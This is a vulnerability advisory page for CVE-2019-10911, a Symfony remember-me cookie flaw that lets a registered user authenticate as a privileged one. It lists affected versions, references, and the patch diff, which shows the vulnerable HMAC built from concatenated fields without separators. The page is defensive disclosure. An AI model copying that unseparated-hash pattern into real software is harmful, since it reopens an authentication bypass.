CVE-2019-10911
Description
In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, a vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled. This is related to symfony/security.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Symfony remember me authentication bypass allows an attacker to authenticate as a privileged user on sites with user registration and remember me login enabled.
A vulnerability in Symfony's security component allows an attacker to bypass authentication and authenticate as a privileged user when remember me functionality is enabled. This affects multiple Symfony versions before 2.7.51, 2.8.50, 3.4.26, 4.1.12, and 4.2.7. [1]
The attacker must have a valid user account on the site (since user registration is required) and the site must have remember me login enabled. The attack complexity is high as per CVSS, requiring specific conditions. The vulnerability is in the symfony/security component. [2]
Successful exploitation allows the attacker to impersonate a privileged user, gaining elevated access. The CVSS score is 7.5 (Important), indicating high confidentiality, integrity, and availability impact. [2]
The fix is to upgrade to patched versions. No workarounds are mentioned. The vulnerability is patched in Symfony versions 2.7.51, 2.8.50, 3.4.26, 4.1.12, and 4.2.7 and later. [1]
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
symfony/security-httpPackagist | >= 2.7.0, < 2.7.51 | 2.7.51 |
symfony/security-httpPackagist | >= 2.8.0, < 2.8.50 | 2.8.50 |
symfony/security-httpPackagist | >= 3.0.0, < 3.4.26 | 3.4.26 |
symfony/security-httpPackagist | >= 4.0.0, < 4.1.12 | 4.1.12 |
symfony/security-httpPackagist | >= 4.2.0, < 4.2.7 | 4.2.7 |
symfony/securityPackagist | >= 2.7.0, < 2.7.51 | 2.7.51 |
symfony/securityPackagist | >= 2.8.0, < 2.8.50 | 2.8.50 |
symfony/securityPackagist | >= 3.0.0, < 3.4.26 | 3.4.26 |
symfony/securityPackagist | >= 4.0.0, < 4.1.12 | 4.1.12 |
symfony/securityPackagist | >= 4.2.0, < 4.2.7 | 4.2.7 |
symfony/symfonyPackagist | >= 2.7.0, < 2.7.51 | 2.7.51 |
symfony/symfonyPackagist | >= 2.8.0, < 2.8.50 | 2.8.50 |
symfony/symfonyPackagist | >= 3.0.0, < 3.4.26 | 3.4.26 |
symfony/symfonyPackagist | >= 4.0.0, < 4.1.12 | 4.1.12 |
symfony/symfonyPackagist | >= 4.2.0, < 4.2.7 | 4.2.7 |
Affected products
4- Symfony/Symfonydescription
- ghsa-coords3 versions
>= 2.7.0, < 2.7.51+ 2 more
- (no CPE)range: >= 2.7.0, < 2.7.51
- (no CPE)range: >= 2.7.0, < 2.7.51
- (no CPE)range: >= 2.7.0, < 2.7.51
Patches
1a29ce2817cf4[Security] Add a separator in the remember me cookie hash
1 file changed · +1 −1
src/Symfony/Component/Security/Http/RememberMe/TokenBasedRememberMeServices.php+1 −1 modified@@ -120,6 +120,6 @@ protected function generateCookieValue($class, $username, $expires, $password) */ protected function generateCookieHash($class, $username, $expires, $password) { - return hash_hmac('sha256', $class.$username.$expires.$password, $this->getSecret()); + return hash_hmac('sha256', $class.self::COOKIE_DELIMITER.$username.self::COOKIE_DELIMITER.$expires.self::COOKIE_DELIMITER.$password, $this->getSecret()); } }
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
9- github.com/advisories/GHSA-cchx-mfrc-fwqrghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2019-10911ghsaADVISORY
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2019-10911.yamlghsaWEB
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2019-10911.yamlghsaWEB
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10911.yamlghsaWEB
- github.com/symfony/symfony/commit/a29ce2817cf43bb1850cf6af114004ac26c7a081ghsax_refsource_CONFIRMWEB
- symfony.com/blog/cve-2019-10911-add-a-separator-in-the-remember-me-cookie-hashghsax_refsource_CONFIRMWEB
- symfony.com/cve-2019-10911ghsaWEB
- www.synology.com/security/advisory/Synology_SA_19_19ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.